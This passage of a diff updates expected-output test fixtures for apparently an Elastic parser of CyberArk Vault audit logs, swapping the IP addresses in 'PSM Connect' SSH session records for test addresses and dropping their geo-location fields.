07:08:28\",\"IsoTimestamp\":\"2021-03-15T14:08:28Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814025\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "300", "kind": "event", "action": "psm connect", @@ -1887,39 +1657,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1936,7 +1685,7 @@ }, "@timestamp": "2021-03-15T14:11:09.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" @@ -1947,16 +1696,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T14:11:09Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 07:11:09\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T14:11:09Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615814025\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 07:11:09\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T14:11:09Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615814025\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Connect", "issuer": "Administrator", "extra_details": { @@ -1968,15 +1716,15 @@ "application_type": "PSMP-SSH", "psmid": "PSMServer", "session_id": "27f74dce-f5d5-4c94-bf99-ca6aafe2c518", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115" + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15" }, "rfc5424": true, "ca_properties": { "other": { "use_sudo_on_reconcile": "Yes" }, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", @@ -1989,9 +1737,9 @@ "cpm_error_details": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", "last_fail_date": "1615814025" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "PSM Connect", "timestamp": "Mar 15 07:11:09", "desc": "PSM Connect" @@ -2002,8 +1750,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:30.936304600Z", - "original": "\u003c5\u003e1 2021-03-15T14:11:09Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:11:09\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:11:09Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814025\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:11:09\",\"IsoTimestamp\":\"2021-03-15T14:11:09Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814025\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", + "ingested": "2021-12-09T13:36:47.331210700Z", + "original": "\u003c5\u003e1 2021-03-15T14:11:09Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:11:09\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:11:09Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814025\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:11:09\",\"IsoTimestamp\":\"2021-03-15T14:11:09Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814025\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "300", "kind": "event", "action": "psm connect", @@ -2026,39 +1774,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2075,7 +1802,7 @@ }, "@timestamp": "2021-03-16T10:04:51.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" @@ -2086,16 +1813,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-16T10:04:51Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 16 03:04:51\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-16T10:04:51Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"4\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615888216\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 16 03:04:51\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-16T10:04:51Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"4\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615888216\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" 